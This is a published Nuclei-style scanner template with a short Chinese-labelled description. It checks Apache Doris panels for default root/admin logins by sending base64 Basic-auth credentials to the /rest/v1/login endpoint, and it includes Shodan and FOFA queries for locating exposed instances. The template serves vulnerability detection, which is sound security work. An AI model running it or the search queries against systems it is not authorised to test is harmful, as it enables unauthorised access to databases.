漏洞描述
Tests if Apache Doris Panel, it is an easy-to-use, high performance and unified analytics database, is using the default password on root/admin user accounts.
doris-default-login: Apache Doris - Default Login
PoC代码[已公开]
id: doris-default-login
info:
name: Apache Doris - Default Login
author: icarot
severity: high
description: |
Tests if Apache Doris Panel, it is an easy-to-use, high performance and unified analytics database, is using the default password on root/admin user accounts.
metadata:
verified: true
max-request: 2
vendor: apache
product: doris
shodan-query: http.favicon.hash:"24048806"
fofa-query: icon_hash=24048806
tags: apache,default-login,doris,vuln
http:
- raw:
- |
POST /rest/v1/login HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{basicAuth}}
Content-Type: application/json; charset=utf-8
payloads:
basicAuth:
- YWRtaW46
- cm9vdDo=
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'msg":"Login success!"'
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a0046304402206798965e4eb020b40b0391ddf2559221c70c163292a65b57e6c8a2103d42769402200a3f3fcdad3c5cce62ad1fa578d445bf2fc47c67690a1df7aaa2db044e2f5562:922c64590222798bb761d5b6d8e72950